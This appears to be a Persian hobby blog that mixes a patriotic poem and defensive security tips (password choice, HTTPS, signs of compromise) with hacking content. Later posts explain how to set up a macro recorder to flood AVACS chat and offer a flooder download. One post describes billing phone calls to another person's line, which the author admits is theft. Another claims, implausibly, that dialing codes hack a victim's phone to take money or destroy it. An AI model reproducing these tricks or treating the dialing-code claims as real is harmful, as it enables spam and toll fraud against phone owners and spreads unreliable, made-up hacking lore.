خرید بک لینک

درباره سایت

SASHA PAYDAR

شبی دل بود و دلدار خردمند دل از دیدار دلبر شاد و خرسند که با بانگ «بنان» و نام «ایران» دو چشمم شد زشور عشق، گریان چو دلبر شور اشک شوق را دید به شیرینی، زمن مستانه پرسید بگو جانا که مفهوم وطن چیست؟ که بی مهرش، دلی گر هست، دل نیست! به زیر پرچم ایران نشستیم و در را جز به روی عشق بستیم به یمن عشق، درّ ناب سفتیم و در وصف وطن این‌گونه گفتیم: وطن یعنی درختی ریشه در خاک اصیل و سالم و پربهره و پاک وطن خاکی سراسر افتخار است که از «جمشید» و از «کی» یادگار است وطن یعنی سرود پاک بودن نگهبان تمام خاک بودن وطن یعنی نژاد آریایی: نجابت، مهرورزی، باصفایی وطن یعنی سرود رقص آتش به استقبال نوروز فره‌وش وطن، خاک اشو «زرتشت» جاوید که دل را می‌برد تا اوج خورشید وطن یعنی «اوستا» خواندن دل به آیین «اهورا» ماندن دل وطن «شوش» و «چغازنبیل» و «کارون» ارس، زاینده‌رود و موج جیحون وطن تیر و کمان «آرش» ماست سیاوش‌های غرق آتش ماست وطن فردوسی و شهنامه‌ی اوست که ایران زنده از هنگامه‌ی اوست وطن آوای «رخش» و بانگ «شبدیز» خروش رستم و گلبانگ پرویز وطن شیرین خسرو پرور ماست صدای تیشه‌ی افسونگر ماست وطن چنگ است بر چنگ «نکیسا» سرود «باربد»ها خسرو آسا وطن نقش‌ونگار تخت جمشید شکوه روزگار تخت‌جمشید وطن را لاله‌های سرنگون است ز یاد «آریو برزن» غرق خون است وطن منشور آزادی کورش شکوه جوشش خون سیاوش وطن خرم ز دین «بابک» پاک که رنگین شد زخونش چهره‌ی خاک وطن یعقوب لیث آرد پدیدار ویا نادرشه پیروز افشار به یک روزش طلوع مازیار است دگر روزش ابومسلم به کار است وطن یعنی دو دست پینه بسته به پای دار قالی‌ها نشسته وطن یعنی هنر، یعنی ظرافت نقوش فرش در اوج لطافت وطن در هی‌هی چوپان «کرد» است که دل را تا بهشت عشق برده است وطن یعنی تفنگ «بختیاری» غرور ملی و دشمن شکاری وطن یعنی «بلوچ» با صلابت دلی عاشق، نگاهی با مهابت وطن یعنی خروش «شروه» خوانی زخاک پاک میهن دیده‌بانی وطن یعنی بلندای دماوند زقهر ملتش ضحاک دربند وطن یعنی «سهند» سرفرازی چنان ستار خانش پاکبازی وطن یعنی سخن، یعنی خراسان سرای جاودان عشق و عرفان! وطن گل‌واژه‌های شعر خیام پیام پرفروغ پیر بسطام وطن یعنی «کمال‌الملک» و «عطار» یکی نقاش و آن یک محو دیدار! در این میهن دو سیمرغ است در سیر یکی شهنامه دیگر منطق‌الطیر یکی «من» را ز دشمن می‌رهاند یکی «دل» را به دلبر می‌رساند! خراسان است و نسل سربداران زجان بگذشتگان در راه ایران وطن خون دل عین‌القضات است نیایش‌نامه‌ی پیر هرات است وطن یعنی «شفا»، «قانون»، «اشارات» خرد بنشسته در قلب عبارات «نظامی» خوش سرود آن پیر کامل: «زمین باشد تن و ایران ما دل» وطن آوای جان شاعر ماست صدای تار باباطاهر ماست اگر چه قلب طاهر را شکستند و دستش را به مکر و حیله بستند ولی ماییم و شعر سبز دلدار دو بیت طاهر و هیهات بسیار وطن یعنی تو و گنجینه‌ی راز تفأل از لسان‌الغیب شیراز وطن آوای جان می‌پرستان سخن از «بوستان» و از «گلستان» وطن دارد سرود «مثنوی» را زلال عشق پاک معنوی را تو دانی «مولوی» از عشق لبریز نشد جز با نگاه «شمس تبریز» مرا نقش وطن در جان جان است همان نقشی که در «نقش جهان» است وطن یعنی سرود مهربانی وطن یعنی شکوه هم‌زبانی وطن یعنی درفش کاویانی سپید و سرخ و سبزی جاودانی به پشت شیر، خورشیدی درخشان نشان قدرت و فرهنگ ایران زعطر خاک میهن گر شوی مست «کویر لوت» ایران هم عزیز است وطن دارالفنون، میرزا تقی خان شهید سرفراز «فین کاشان» وطن یعنی بهارستان، مصدق حضوری بی‌ریا چون صبح صادق زخاک پاک ما «پروین» بخیزد «بهار» آن یار مهرآیین، بخیزد که از جان ناله با «مرغ سحر» کرد دل شوریده را زیروزبر کرد وطن یعنی صدای شعر «نیما» طنین جان‌فزای موج دریا زدریای وطن خیزد همی دُر چو آژیر و چو دریادار بایندر وطن یعنی «خزر»، صیاد، جنگل «خلیج فارس»، رقص نور، مشعل وطن یعنی تجلی‌گاه ملت حضور زنده آگاه ملت وطن یعنی دیار عشق و «امید» دیار ماندگار نسل خورشید کنون ای هم‌وطن، ای جان جانان بیا با ما بگو «پاینده ایران»E

امکانات وب

 

چند مورد گزارش از فعالیت ناخواسته در تلگرام گزارش شد و بر آن شدیم تا روشی مطمئن برای جلوگیری از هک تلگرام را آموزش بدهیم.

چگونه تلگرام هک می شود؟

تلگرام به خودی خود هک نمی شود و این شرکت برای هک سرورهایش مبلغ هنگفتی را به عنوان جایزه قرار داده است ولی به کمک بدافزار یا فورواردر پیام یا حتی بدون هیچ نرم افزاری می شود به تلگرام دیگران وارد شد که توضیحش را بنا به دلایل روشن امنیت در این سایت قرار نمی دهیم.

اگر می خواهید تلگرام تان هک نشود همین امروز به فعال کردن تایید دومرحله ای اقدام نمایید.

BARAYE MOSHAHEDE BE EDAME MATLAB BERAVID

ادامه مطلب

برچسب: چگونه تلگرام هک می شود؟, نویسنده: SASHA PAYDAR تاريخ: شنبه 21 شهريور 1394 ساعت: 9:34

خب روش های زیادی واسه هک کردن وجود داره ک من میخوام 2 تاشو واستون توضیح بدم!

1. برای پیدا کردن رمز یاهو یا جی میل یا ف.یس.بوک :

ترای کردن! یا تست کردن! مثلا الان من میتونم بگم ک رمز خیلی ها 12345 و 54321 و 123456 یا شناره موبایلشون یاشماره خونشون یا اسم کسی ک دوسش داره یا تاریخ تولدش + اسمش هست! ک اگه اینطوری باشه به سادگی میشه رمز رو پیدا کرد البته هکر ها واسه خودشون یه لیست هایی دارن ک توش یه تعداد زیاد از کد های احتمالی رو گذاشتن و با نرم افزار های خاص سریعتر ب هدف میرسن.

اما راه جلوگیری از این نوع هک کردن: اینه ک از مخفف یه جمله برای رمز استفاده کنید! مثلا: من و 2برادرم خیلی قرمه سبزی دوست داریم.   مخفف:  mv2bkgsdd   .

* سعی کنید تو اون جمله یه عدد یا علامت هم باشه!

2. روش دوم : برای پیدا کردن رمز کارت اعتباری و ایمیل و رمز فیسبوک تون:

این روش به این صورته که مثلا میرید تو یه سایت ک شارژ بخرید. بعد مبلغ و ... انتخاب میکنید و وارد صفحه ی بانک میشید! اما در واقع اون صفحه مال بانک نیست! صفحه ایه ک هکر طراحی کرده! شما تو اون صفحه شماره و رمز کارت اعتباریتونو میزنید و ......... دیدیدیدینگ! شما هک شدید! یا با همین روش یه صفحه درست میکنن ک ایمیلتون رو هک کنن!

راه جلوگیری از این روش هم خیلی سادست! فقط دقت کنید هرجایی ک اطلاعات مهم وارد میکنین httpS باشه. اینم نمونه:
 


خب همونطور ک دیدید با این روش میشه آی دی تون رو و اکانت های دیگتون رو هک کنن.

امیدوارم به دردتون خورده باشه!
موفق باشید!

 

 

SASHA PAYDAR

برچسب: 2 روش هـــــــــــــکــــــــــــ کردن,SASHA PAYDAR, نویسنده: SASHA PAYDAR تاريخ: شنبه 21 شهريور 1394 ساعت: 9:00

 

این رکوردر رو هم با آواکس قدیمی کامپیوتر و هم با آواکس جدید کامپیوتر میتوانید استفاده کنید و بسیار رکوردر کار آمد و پر مزیتی می باشد .

دوستان عزیز برای نصب رکوردر بعد از دانلود فایل Zip را باز کنید مسیر نصب را مشخص کنید و سپس روی عکس کامپیوتر که در گوشه setup است کلیک کنید تا فایل رکوردر نصب شود .

 

پس از نصب رکوردر را باز کنید . نگران نباشید که با این همه گزینه باید چکار کنید ! شما فقط با چهار تا از این گزینه ها و بخش ها کار دارید . ابتدا  به 3 گزینه بالای آن توجه کنید . روی Macro code کلیک کنید . ایجا جایی است که متن ها و پی.ام های شما نوشته میشود . برای اینکه رکوردر بتواند با برنامه آواکس پی.ام بدهد باید راهنمایی اش کنید و بگویید که چکار کند پس در همین Macro Code باید راهنمایی اش کنید و پی.ام هایی که قرار است با برنامه آواکس بدهد را برایش مشخص کنید . پس برای این کار به 3 نوشته دقت میکنید . یعنی برای هر پی.ام باید به رکوردر 3 تا نوشته بدهید . یکی اینکه چکار کند  و یکی اینکه چه چیزی بنویسد و دیری اینکه چطوری ارسالش کند ؟ پس شما این 3 نوشته رو می نویسین و براش توضیح میدین بعد یک پی.ام درست میشه . به این 3 نوشته که یک پی.ام هستند دقت کنید.

(یعنی رکوردر با این 3 نوشته میتواند یک پی.ام در آواکس بدهد) :

RelativeMouse AVACS Live Chat, 1, 1, 37, 36, 0}}

SASHA PAYDAR

{F2}

نوشته اول: به رکوردر گفت که باید در برنامه ای به نام آواکس آواکس پیام بدهی .

نوشته دوم : به رکوردر یک متن داد که این پیام را بنویسد .

نوشته سوم : روش فرستادن پیام را به او گفت که با کدام دکمه ارسال کند .

 

خب تا اینجا یک پی.ام برای رکوردر نوشتیم . اما یکی کافی نیست . فرض کنید 5 پی.ام برای آن نوشتید . حالا رکوردر وقتی آن 5 پی.ام را داد و تمام شد دیگر پی.امی برای فرستادن ندارد و از اول شروع نمیکند. پس باید به تعداد مناسبی از این ها بذارید تا رکوردر هنگ نکند و دقت کنید که 2 تا نوشته ی بالا و پایین ( اولی و سومی ) را باید دقیق بنویسید اگر حتی نقطه ای از آن جابجا شود رکوردر مشکل پیدا میکند .

وقتی مقداری پی .ام ساختید آنها را در یک فایل word ذخیره کنید که دوباره وقت شما تلف نشود .

 

اما در بخش General گزینه ای میبینید به نام Line Delay این عدد که جلوی این گزینه قرار دارد سرعت پی.ام دادن رکوردر شماست که بر اساس تجربه ای که از فلود دارید و بر اساس سرعت دلخواه تنظیم میکنید.

اگر این رکوردر را با آواکس قدیمی استفاده میکینید 5 بار روی آواکس قدیمی کلیک کنید تابر یک آیدی 5 آواکس باز کرده باشید . سپس این با رکوردر پلی بزنید و سرعت و دقت و ظرافت از با این رکوردر که در آواکس بلاگ در اختیار دانلود رایگان شماست لذت ببرید.
اگر این رکوردر را با آواکس جدید استفاده میکنید . 5 آواکس جدید آنلاین هر کدام یک آیدی که در پست های قبل براتون گذاشتم باز کنید و با رکوردر پلی بزنید و همزمان روی هر 5 تا استفاده کنید.

اگه توضیح مفید بود برام نظر بزارین . ارادتمند همه
 
SASHA PAYDAR
 

 

 

 

برچسب: RECORDER,OTOMATIC,AVACS,PC,SASHA,PAYDAR, نویسنده: SASHA PAYDAR تاريخ: شنبه 21 شهريور 1394 ساعت: 2:26

INAM FLOODER KE HAME MIDONAN CHIE O ZIAD AZASH ESTEFADE MIKONAN O NESFE NEOHAYE AVACS BA IN NEO SHODAN HA HA HA   AZ LINK ZIR DOWNLAOD KONID   "SASHA PAYDAR"

 

 

 

 

 

چشمک

 

 

برچسب: FLODER AVCS,FILODER OTOMATIC PC,SASHA PAYDAR, نویسنده: SASHA PAYDAR تاريخ: شنبه 21 شهريور 1394 ساعت: 2:41

اخیرا اتفاقات عجیب و غریبی روی کامپیوترتان رخ می دهد؛ از آن دسته اتفاقاتی که لج شما را درمی آورند؟ ایمیل های عجیب دریافت می کنید؟ گاهی وقت ها چیزی روی Desktop تان درست نیست؟ اگر اینطور است حتما این گزارش را تا پایان دنبال کنید. در این گزارش خواهید فهمید که آیا هک شده اید یا نه و اگر هک شدید چطور با آن مقابله کنید. نشانه ۱ پیام اخطار تقلبی آنتی ویروس پیام های خطری که خیلی ناگهانی روی صفحه مانیتور ظاهر می شود تا به شما بگویند در خطر هستید، همیشه همانی نیستند که به نظر می آید. بعضی از این پیام ها حتی ممکن است از شما برای فعال شدن، درخواست کد فعال سازی بکنند در حالی که بقیه ممکن است از شما بخواهند کلیدی را فشار دهید تا سیستم شما را پاک کنند. تقریبا تمام پیام های آنلاین از این دست تقلبی اند و نباید روی آنها کلیک کنید. اما همین که شما این پیام ها را می بینید به این معناست که احتمالا سیستم تان پیشاپیش آلوده شده است. چه باید کرد اول از همه همیشه ظاهر آنتی ویروس خود را به خاطر داشته باشید. پنجره های خطر آنتی ویروس شما صددرصد با این پیام های تقلبی تفاوت اساسی دارد. در ضمن روی هیچ چیز کلیک نکنید. با کمک Ctrl+Shift+Escap پنجره Task Manager را باز کنید. فایلی که به آن مشکوک هستید را در فهرست نرم افزارهای در حال اجرای خود پیدا کرده و ببندید. پیدا کردن آن نباید چندان سخت باشد چون معمولا بار پردازشی زیادی می برند. سپس کامپیوتر خود را ری استارت کرده و با نگه داشتن کلید F8 در زمان بوت شدن سیستم وارد محیط Safe Mode شوید. در اینجا با آنتی ویروس یا هر نرم افزار ایمنی دیگر مثل Malwarebytes سیستم خود را اسکن کنید و بدافزار یافت شده را پاک کنید. پس از آن بهترین کار این است که اگر قبلا بک آپی از سیستم گرفته ای آن را دوباره ذخیره کنید و امیدوار باشید که از شر بدافزار فوق خلاص شده اید. نشانه ۲ مشاهده هرزنامه در ایمیل یا شبکه های اجتماعی اگر در شبکه اجتماعی خود به تازگی تصاویر یا پیام های غیراخلاقی مشاهده می کنید یا ایمیل هایی حاوی مطالبی از این دست دریافت می کنید که مثلا «اگر روی لینک زیر کلیک کنید چه ها می شود» یا مثلا «بشتابید که تصویر فلان بازیگر لو رفت»، به این معنی است که احتمالا اکانت شما آلوده شده است. اگر اکانت ایمیل شما هک شده باشد، حتی ممکن است دوستان شما هم پیام های آلوده ای از سوی شما دریافت کنند که حاوی اینگونه هرزنامه هاست. این موارد زمانی دردسرساز می شود که کنترل اکانت را هم درنهایت از دست بدهید. چه باید کرد بیشتر شبکه های اجتماعی پروسه اختصاصی دارند که با دنبال کردن مراحل تعریف شده در آن مجددا می توانید کنترل اکانت خود را به دست آورید. به عنوان مثال Gmail صفحه راهنمایی موسوم به Compromised Gmail account (در آدرس bit.ly/gmail338) دارد که با فراهم کردن فرمی برای درخواست بازیابی اکانت هایی که شما دیگر نمی توانید وارد آنها شوید به شما کمک می کند. چنین صفحه ای برای اکانت های Yahoo به آدرس bit.ly/yahoo338 و برای outlook به آدرس bit.ly/outlook338 نیز وجود دارد. نشانه ۳ پسورد اکانت شما تغییر کرده اگر زمانی که تلاش می کنید به یکی از سرویس های آنلاین خود مثل ایمیل، هاست یا حتی حساب بانکی خود دسترسی پیدا کنید با این پیام که پسورد شما درست نیست مواجه می شوید احتمال زیادی هست که پسورد شما هک شده باشد. البته اگر مطمئن هستید که پسورد را درست وارد کرده اید. چه باید کرد قبل از اینکه بترسید و سر مانیتور داد بکشید، دقت کنید که اصلا پسورد را درست وارد کرده اید یا نه. در بیشتر مواقع اتفاقات ساده ای مثل روشن ماندن Capslock یا فارسی بودن صفحه کلید می تواند پسورد شما را به هم بریزد. اگر نه، تلاش کنید از گزینه من پسوردم را فراموش کردم یا I’ve Forget my password که در همه سایت ها وجود دارد، استفاده کنید و به سرعت پسورد جدید را تغییر دهید. توجه کنید که در این شرایط اگر اکانت دیگری دارید که از پسورد مشابه استفاده می کند حتما آن را هم تغییر دهید. البته اساسا استفاده از پسوردهای مشابه کار خوبی نیست. توجه کنید که اگر این اتفاق روی کارت بانکی شما افتاده سریعا با بانک تماس بگیرید تا حساب شما را ببندند. نشانه ۴ تغییراتی ناخواسته در مرورگر اینترنتی یا دسکتاپ مرورگر شما ناخواسته روی صفحه ای خاص باز می شود، نوار ابزاری (Toolbar) که شما نمی شناسید روی آن نصب شده یا تنظیمات مرورگر بدون هیچ دلیل واضحی تغییر کرده است. روی دسکتاپ یا بخش ابزارهای تسک بار ممکن است متوجه آیکون نرم افزاری ناشناس شوید، چنین نشانه هایی می تواند خبر از نقصی امنیتی در سیستم شما باشد. چه باید کرد در بیشتر مواقع پاک کردن آسان ترین شیوه است. مثلا در رابطه با مرورگر کافی است به بخش Extension های مرورگر فوق رفته و نوار ابزار ناخواسته را پاک کنید. همچنین می توانید از طریق پنجره تنظیمات (settings در Chorme یا Options در Firefox) صفحه وب اصلی خود را که مرورگر روی آن باز می شود، مجددا بازگردانید. در مورد خود ویندوز هم در پنجره computer و از طریق Uninstall or change a program نرم افزارهای ناخواسته را از سیستم خود پاک کنید اما اگر همچنان با مشکل مواجه بودید حتما سیستم خود را با یک آنتی ویروس جدید و آپدیت یا یک نرم افزار ضد اسپای وار مثل superantispyware اسکن کنید. توجه کنید که بعضی نرم افزارها طراحی شده اند تا از چشم شما پنهان بمانند؛ برای این منظور میکروسافت ابزار رایگانی دارد که به شما می گوید چه نرم افزارهایی هنگام راه اندازی ویندوز به صورت خودکار اجرا می شوند و کمک می کند تا آنها را غیرفعال یا پاک کنید. این ابزار از آدرس Bit.ly/auto338 قابل دانلود است. نشانه ۵ رفتار عجیب موس کامپیوتر نشانگر موس شما در صفحه به دلخواه خودش حرکت می کند، نه فقط حرکت تصادفی بلکه گاهی حتی برنامه ای را اجرا کرده یا به وب سایتی وارد می شود. خوشبختانه این نوع از هک اتفاق بسیار نادری است. چه باید کرد متاسفانه باید گفت که اگر چنین چیزی را تجربه می کنید به این معنا است که توسط یک هکر حرفه ای هک شده اید. در این حالت تنها یک متخصص حرفه ای می تواند مشکل شما را حل کند. البته در عین حال کارهای ساده ای هست که باید انجام دهید. اول از همه ارتباط خود با اینترنت را قطع کنید. سپس در اولین فرصت با استفاده از گوشی یا هر کامپیوتر دیگری که مطمئن هستید پاک است، پسورد تمامی اکانت های آنلاین خود را تغییر دهید. به خاطر داشته باشید که پسورد بانک ها اولویت دارند. کامپیوتر آلوده را در وضعیت Safe Mode روشن کرده و با استفاده از آنتی ویروس آن را اسکن کنید. برای ورود به Safe Mode کافی است هنگام روشن شدن سیستم چند بار کلید F8 را فشار دهید. در نهایت اگر از سیستم خود بک آپ دارید، اکنون وقت بازیابی آن است. توجه کنید که در صورت بروز این اتفاق، مشورت با یک کارشناس کامپیوتر بهترین راه ممکن برای شماست. نشانه ۶ کسی شما را زیر نظر دارد! چراغ وضعیت وب کم شما خود به خود خاموش و روشن می شود یا حس می کنید چیزی در سیستم درست نیست! اگر چنین اتفاقی برای شما افتاده، شما حتما هک شده اید. این نوع هک همان اتفاقی بود که سال پیش سروصدای زیادی در آمریکا به پا کرد. چه باید کرد روی وب کم خود را بپوشانید یا اگر می توانید آن را به کلی قطع کنید. سیستم را مجددا راه اندازی کرده وارد Computer شوید. از System Properties وارد Remote setting شوید. در این قسمت تیک کنار گزینه زیر را بردارید: Allow Remote Assistance coections to this computer سپس با استفاده از آنتی ویروس، سیستم خود را زیر و رو کنید.

برچسب: علائم هک شدن,راهکارهای سیستم هک شده,هک شدن سیستم, نویسنده: SASHA PAYDAR تاريخ: چهارشنبه 18 شهريور 1394 ساعت: 4:46

برچسب: Download,Amoozesh Hack Pishrafte,SASHA PAYDAR, نویسنده: SASHA PAYDAR تاريخ: جمعه 20 شهريور 1394 ساعت: 21:35

ﺷﻤﺎ ﻣﯿﺘﻮﻧﯿﺪ ﺑﺎ ﻣﻮﺑﺎﯾﻠﺘﻮﻥ ﻫﺮ ﭼﻨﺪﺗﺎ ﺧﻮﺍﺳﺘﯿﺪ ﺗﻠﻔﻦ ﺑﺰﻧﯿﺪ ﻭ ﻫﺰﯾﻨﻪ ﻫﺎ ﺭﺍ ﺑﻪ ﺣﺴﺎﺏ ﯾﻪ ﻧﻔﺮ ﺩﯾﮕﻪ ﺑﺬﺍﺭﯾﺪ ﺧﯿﻠﯽ ﺑﺎ ﺣﺎﻟﻪ ﻧﻪ؟ ﺑﺮﺍﯼ ﺍﯾﻨﮑﺎﺭ ﺑﺎﯾﺪ ﯾﻪ ﮐﺎﺭﻫﺎﯾﯽ ﺍﻧﺠﺎﻡ ﺑﺪﯾﻦ ﺑﻪ ﺍﯾﻦ ﺻﻮﺭﺕ : ﺍﻭﻝ ﻣﺒﺎﯾﻞ ﺍﻭﻥ ﺷﺨﺼﯽ ﺭﺍ ﮐﻪ ﻣﯽ ﺧﻮﺍﻫﯿﺪ ﻫﺰﯾﻨﻪ ﻫﺎ ﺭﺍ ﺑﭙﺮﺩﺍﺯﺩ ﺑﺮ ﺩﺍﺭﯾﺪ ﻭ ﺷﻤﺎﺭﻩ ﺍﯼ ﺭﺍ ﮐﻪ ﻣﯿﺨﻮﺍﻫﯿﺪ ﻫﺰﯾﻨﻪ ﺍﺵ ﺑﺮﺩﺍﺷﺘﻪ ﺑﺸﻪ ﺭﺍ ﺑﮕﯿﺮﯾﺪ ﺍﻟﺒﺘﻪ ﻗﺒﻠﺶ ﯾﮏ + ﯾﺎ +90 ﺍﺿﺎﻓﻪ ﮐﻨﯿﺪ ﻣﺜﻼْ ﺑﻪ ﺍﯾﻦ ﺻﻮﺭﺕ +09133107777: ﮐﻪ ﺩﺭ ﻧﺘﯿﺠﻪ ﺩﯾﮕﻪ ﻫﺰﯾﻨﻪ ﺑﻪ ﺻﻮﺭﺕ ﺣﺴﺎﺏ ﺍﯾﻦ ﺷﻤﺎﺭﻩ ﺍﺿﺎﻓﻪ ﻧﻤﯿﺸﻪ ﻭ ﻫﻤﺶ ﻣﯿﺮﻩ ﺑﻪ ﺣﺴﺎﺏ ﮐﺴﯽ ﮐﻪ ﺷﻤﺎ ﺍﯾﻦ ﺷﻤﺎﺭﻩ ﺭﺍ ﺑﺎ ﻣﺒﺎﯾﻠﺶ ﮔﺮﻓﺘﯿﺪ ﺍﻟﺒﺘﻪ ﺍﯾﻦ ﮐﺎﺭ ﺑﺎ ﺩﺯﺩﯼ ﻓﺮﻗﯽ ﻧﺪﺍﺭﻩ ﺍﻣﺎ ﺻﺪ ﺩﺭ ﺻﺪ ﺟﻮﺍﺏ ﻣﯿﺪﻩ ﻭ ﺧﻮﺩ ﻣﺨﺎﺑﺮﺍﺕ ﻫﻢ ﺍﻋﻼﻡ ﮐﺮﺩﻩ ﮐﻪ ﻫﻤﭽﻨﺎﻥ ﺭﺍﻫﯽ ﺑﺮﺍﯼ ﺍﯾﻦ ﻣﺸﮑﻞ ﭘﯿﺪﺍ ﻧﮑﺮﺩﻥ ! ﭘﺲ ﺍﺯ ﺍﻣﺮﻭ ﻣﻮﺑﺎﯾﻠﺘﻮﻥ ﺭﻭ ﺩﺳﺖ ﻫﻤﻪ ﮐﺲ ﻧﺪﯾﻦ ! ﺍﯾﻦ ﺭﻭﺵ ﻫﻢ ﻣﺎﻧﻨﺪ ﺭﻭﺵ ﺑﺎﻻ ﮐﺎﻣﻼ ﺍﻣﺘﺤﺎﻥ ﺷﺪﻩ ! ﺩﺭ ﺍﯾﻦ ﺭﻭﺵ ﻫﺮ ﻭﻗﺖ ﻓﯿﺶ ﻣﻮﺑﺎﯾﻠﺘﻮﻥ ﺍﺯ ﺣﺪ ﻣﻌﻤﻮﻝ ﺑﯿﺸﺘﺮ ﺷﺪ ﺑﺮﯾﺪ ﻭ ﭘﺮﯾﻨﺖ ﺍﻭﻧﻮ ﺍﺯ ﻣﺨﺎﺑﺮﺍﺕ ﺑﺨﻮﺍﯾﻦ ﻭ ﻭﻗﺘﯽ ﭘﺮﯾﻨﺖ ﺭﻭ ﮔﺮﻓﺘﯿﻦ ﺑﺒﯿﻨﯿﻦ ﻗﺴﻤﺖ (ﺑﺪﻫﮑﺎﺭ ) ﻭ ( ﺑﺴﺘﺎﻧﮑﺎﺭ ) ﻣﻮﺑﺎﯾﻠﺘﻮﻥ ﺑﺎ ﻫﻢ ﺑﺮﺍﺑﺮﻩ ﯾﺎ ﻧﻪ ﺍﮔﻪ ﺑﺎ ﻫﻢ ﺑﺮﺍﺑﺮ ﻧﺒﻮﺩ ﻣﺼﺒﺐ ﺍﻭﻧﻮ ﺣﻼﻝ ﮐﻨﯿﻦ ﮐﻪ ﺍﻭﻥ ﺩﻧﯿﺎ ﺩﯾﮕﻪ ﻧﻤﮏ ﮔﯿﺮﺗﻮﻥ ﻧﺸﻪ Sasha Paydar

برچسب: ﺗﻠﻔﻦ ﺯﺩﻥ ﺑﺎ ﻣﻮﺑﺎﯾﻞ ﺍﻣﺎﺍﺍﺍﺍﺍﺍﺍ ﺑﻪ ﺣﺴﺎﺏ ﺩﯾﮕﺮﯼ,SASHA PAYDAR, نویسنده: SASHA PAYDAR تاريخ: چهارشنبه 11 شهريور 1394 ساعت: 7:38

ﺮﺍﯼ ﻫﮏ ﮐﺮﺩﻥ ﻣﻮﺑﺎﯾﻞ ﮐﺴﯽ ﺑﺎﯾﺪ ﮔﻮﺷﯽ ﺍﻭﻥ ﺭﻭ ﯾﮏ ﺑﺎﺭ ﺑﻪ ﺩﺳﺘﺘﻮﻥ ﺑﮕﯿﺮﯾﺪ ﻭ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﺧﻮﺩﺗﻮﻥ ﺭﻭ ﺑﻪ ﺻﻮﺭﺕ ﺯﯾﺮ ﺑﮕﯿﺮﯾﺪ .ﻣﺜﻼ ﺍﮔﺮ ﺷﻤﺎﺭﻩ ﺷﻤﺎ :: ۰۹۱۷۷۸۲۵۰۱۰ ﺑﻮﺩ ﺷﻤﺎ ﺑﺎﯾﺪ ﺑﻪ ﺻﻮﺭﺕ : ۰۹۱۷۷۸۲۵۰۱۰ * ﺑﮕﯿﺮﯾﺪ ﯾﻌﻨﯽ ﺟﻠﻮﺵ ﯾﮏ ﺳﺘﺎﺭﻩ ﺑﮕﺬﺍﺭﯾﺪ .ﻭ ﻭﻗﺘﯽ ﺷﻤﺎﺭﻩ ﮔﺮﻓﺘﻪ ﺷﺪ ﮐﺎﻓﯿﻪ ﮔﻮﺷﯿﺘﻮﻧﻮ ﺑﺮﺩﺍﺭﯾﺪ ﺗﺎ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﺷﻮﺩ . ﺧﺐ ﺣﺎﻻ ﺩﺭ ﻭﺍﻗﻊ ﻣﯿﺘﻮﻧﯿﻢ ﺑﮕﯿﻢ ﮐﻪ ﮔﻮﺷﯽ ﻗﺮﺑﺎﻧﯽ ﻫﮏ ﺷﺪ .ﻭ ﻣﺮﺣﻠﻪ ﺣﺴﺎﺱ ﺍﯾﻦ ﺍﺳﺖ ﮐﻪ ﺑﺪﻭﻧﯿﻢ ﭼﻪ ﺟﻮﺭﯼ ﻣﯿﺸﻪ ﺑﻘﯿﻪ ﮐﺎﺭﻭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ . ﺣﺎﻻ ﻣﺎ ﺩﺭ ﺍﯾﻦ ﺣﺎﻟﺖ ﻣﯿﺘﻮﻧﯿﻢ ۳ ﺗﺎ ﮐﺎﺭ ﺭﻭ ﺁﻧﺠﺎﻡ ﺑﺪﺑﯿﻢ . ﺩﺭ ﻗﺴﻤﺖ ﺯﯾﺮ ﺑﻪ ﺍﻭﻥ ﺳﻪ ﮐﺎﺭ ﺍﺷﺎﺭﻩ ﺷﺪﻩ، ﺩ ﻣﯿﺰﻧﻢ ﻭﺍﯾﻦ ﺁﻣﻮﺯﺵ ﺳﻪ ﮐﺎﺭﯼ ﺍﺳﺖ ﮐﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺗﺮﻓﻨﺪ ﺑﺎﻻ ﺑﺮ ﺭﻭﯼ ﮔﻮﺷﯽ ﻗﺮﺑﺎﻧﯽ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺍﺳﺖ: : ﻋﺪﺩ ۲۳ ﺭﻭ ﺷﻤﺎﺭﻩ ﮔﯿﺮﯼ ﮐﻨﯿﺪ ﻭ ﺑﻌﺪ ﺍﺯ ﺷﻨﯿﺪﻥ ﺑﻮﻕ ﺁﺯﺍﺩ ﺷﻤﺎﺭﻩ ﺑﮕﯿﺮﯾﺪ ﻭ ﭘﻮﻝ ﺭﻭ ﺑﻪ ﺣﺴﺎﺏ !… :ﻓﻘﻂ ﮐﺎﻓﯿﺴﺖ ﺑﻌﺪ ﻫﮏ ﮐﺮﺩﻥ ﮔﻮﺷﯽ ﺩﮐﻤﻪ * ( ﺳﺘﺎﺭﻩ ) ﺭﻭ ﻓﺸﺎﺭ ﺑﺪﯾﺪ ﻭ ﺧﻂ ﻗﺮﺑﺎﻧﯽ ﺭﻭ ﮐﻨﺘﺮﻝ ﮐﻨﯿﺪ . ۳ :ﻋﺪﺩ ۶۷۶۷۵۴۳۲ ﺭﻭ ﺷﻤﺎﺭﻩ ﮔﯿﺮﯼ ﮐﻨﯿﺪ ﻭ ok ﯾﺎ ﻫﻤﺎﻥ ﺩﮐﻤﻪ ﺍﺗﺼﺎﻝ ﺭﺍ ﻓﺸﺎﺭ ﺩﻫﯿﺪ ﺑﻌﺪ ﺑﺎ ﭘﯿﻐﺎﻣﯽ ﺭﻭ ﺑﻪ ﺭﻭ ﻣﯿﺸﻮﯾﺪ ﮐﻪ ﻣﯿﮕﻪ ﺍﺭﺗﺒﺎﻁ ﻗﻄﻊ ﺷﺪ ﯾﻌﻨﯽ ﮔﻮﺷﯽ ﺳﻮﺧﺖ . ﮐﻠﯿﻪ ﺍﯾﻦ ﺭﻭﺷﻬﺎ ﺍﻣﺘﺤﺎﻥ ﺷﺪﻩ ﻫﺴﺘﻨﺪ ﭘﺲ ﺳﻌﯽ ﮐﻨﯿﺪ ﺣﺘﺎﻟﻤﻘﺪﻭﺭ ﺩﺭ ﻣﻮﺭﺩ ﮔﻮﺷﯽ ﻫﻬﺎﯼ ﺍﺭﺯﺍﻥ ﻗﯿﻤﺖ ﺍﻣﺘﺤﺎﻥ ﮐﻨﯿﻦ ﮐﻪ ﺿﺮﺭ ﻣﺎﻟﯽ ﺯﯾﺎﺩﯼ ﮔﺮﯾﺒﺎﻥ ﮔﯿﺮ ﺷﻤﺎ ﻧﺸﻮﺩ ﮐﻠﯿﻪ ﺍﯾﻦ ﺭﻭﺷﻬﺎ 